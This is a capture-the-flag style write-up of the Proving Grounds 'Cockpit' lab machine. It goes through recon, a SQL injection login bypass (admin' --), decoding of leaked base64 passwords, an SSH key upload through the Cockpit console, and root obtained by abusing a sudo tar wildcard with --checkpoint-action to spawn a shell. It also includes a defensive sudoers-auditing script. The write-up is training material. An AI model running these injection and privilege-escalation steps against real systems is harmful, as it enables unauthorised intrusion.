
Proving Grounds Practice - Cockpit

scans

autorecon

info

- OS: Ubuntu 20.04.6 LTS
- ports
  - 22: OpenSSH 8.2
  - 80: Apache 2.4.41, title: blaze
    http://192.168.166.10/img/
    http://192.168.166.10/blocked.html
    http://192.168.166.10/login.php
    http://192.168.166.10/db_config.php
  - 9090: version 2.1.4, OpenSSL 3.3.2.3, ssl/zeus-admin?
- things to try
  - apache 2.4.41
  - 80 admin
  - 9090 zeus-admin
  - blaze username
  - cockpit

22 OpenSSH 8.2

No known vulnerabilities.

80 blaze

Login page at 192.168.166.10.

Weak passwords admin:admin/123456/password/abc123 were all incorrect.

9090 cockpit

192.168.166.10:9090

Weak-password logins failed.

Checked the page source; the CMS is cockpit.

searchsploit cockpit lists known vulnerabilities, but exploitation failed, and searching for "cockpit exploit" turned up nothing either.

foothold

Checked the hints: blaze has a SQL injection vulnerability in the login form, admin' --

After logging in, obtained usernames and base64-encoded passwords.

Decoded, they are:

james
canttouchhhthiss@455152

cameron
thisscanttbetouchedd@455152

Tried SSH as james with that password; the server only accepts public-key authentication.

ssh james@192.168.166.10
james@192.168.166.10: Permission denied (publickey).

Logged into port 9090 as james; the account page allows uploading an SSH public key, after which SSH works.

ssh james@192.168.166.10

whoami
james

escalation

Checking processes, cron jobs and so on turned up nothing. sudo -l shows that tar can be run with sudo, and the GTFOBins tar entry (https://gtfobins.github.io/gtfobins/tar/) gives root directly.

sudo -l
Matching Defaults entries for james on blaze:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on blaze:
(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *



sudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=/bin/sh
apt-changelog-ZA6iyM/
snap-private-tmp/
snap-private-tmp/snap.lxd/
snap-private-tmp/snap.lxd/tmp/
ssh-6KkSqBBpG1eF/
/usr/bin/tar: ssh-6KkSqBBpG1eF/agent.131828: socket ignored
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-apache2.service-43mHFi/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-apache2.service-43mHFi/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-ModemManager.service-l1tS1f/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-ModemManager.service-l1tS1f/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-logind.service-0vp5Lh/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-logind.service-0vp5Lh/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-resolved.service-pGOwNf/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-resolved.service-pGOwNf/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-timesyncd.service-Ll8SPh/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-systemd-timesyncd.service-Ll8SPh/tmp/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-upower.service-65G4Yi/
systemd-private-1c25937d4cfb4fd0b9e84c8d8e470646-upower.service-65G4Yi/tmp/
tmp.es7Hxs9VMb
tmp.eXjbihXM2N
tmp.gvPWK74jcw
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
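The sudo rule above fails because the trailing `*` lets the caller append any options to tar. As an added defender-side example (not part of the original write-up), this script audits sudoers rules offline for that pattern: argument wildcards, binaries whose own options can run a command, and NOPASSWD on top of either. The SAMPLE_SUDOERS text and the SHELL_CAPABLE_BINS list are constructed for the example.

```python
import os
import re

# Constructed sample sudoers (not from the target); the james rule mirrors the
# "sudo -l" output above, the others are controls that should not fire.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
james   ALL=(ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *
deploy  ALL=(root) NOPASSWD: /usr/local/bin/backup.sh
ops     ALL=(ALL) /usr/bin/systemctl restart nginx, /usr/bin/journalctl -u nginx
"""

# Binaries whose own options turn an argument into a command to run (tar
# --checkpoint-action, rsync -e, zip -T). Illustrative subset, not exhaustive.
SHELL_CAPABLE_BINS = {"tar", "rsync", "zip"}
GLOB_CHARS = set("*?[")

# One-line rule form: user host=(runas) [TAG: ...] cmd[, cmd ...]
# (rules without a runas clause are skipped by this simplified parser)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text):
    """Return (user, command, reasons) for every command spec whose argument
    handling lets the caller do more than the rule's author intended."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if not m:
            continue
        for spec in (s.strip() for s in m["cmds"].split(",")):
            argv = spec.split()
            if not argv:
                continue
            # sudo's "*" matches any run of arguments, so "tar ... *" also accepts
            # extra options appended by the caller (the --checkpoint-action trick
            # above); a command listed with no arguments accepts any arguments.
            wildcard = any(c in GLOB_CHARS for c in " ".join(argv[1:]))
            reasons = ["wildcard-args"] if wildcard else []
            if (wildcard or len(argv) == 1) and \
                    os.path.basename(argv[0]) in SHELL_CAPABLE_BINS:
                reasons.append("shell-capable-binary")
            if reasons and "NOPASSWD" in m["tags"]:
                reasons.append("nopasswd")  # aggravating only, never reported alone
            if reasons:
                findings.append((m["user"], spec, reasons))
    return findings
```

Running `audit_sudoers(SAMPLE_SUDOERS)` reports only the james rule; the fix is to pin the paths being backed up (no wildcard) or move the backup into a root-owned, non-writable wrapper script and grant sudo on that instead.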

Reflections

  1. Recent labs have all been about using known vulnerabilities, and I did not even test SQL injection, the thing that should have been tried first.
  2. When an exploit cannot be made to work, don't get stuck on it? The OSCP probably won't use a target whose exploit needs heavy modification to work?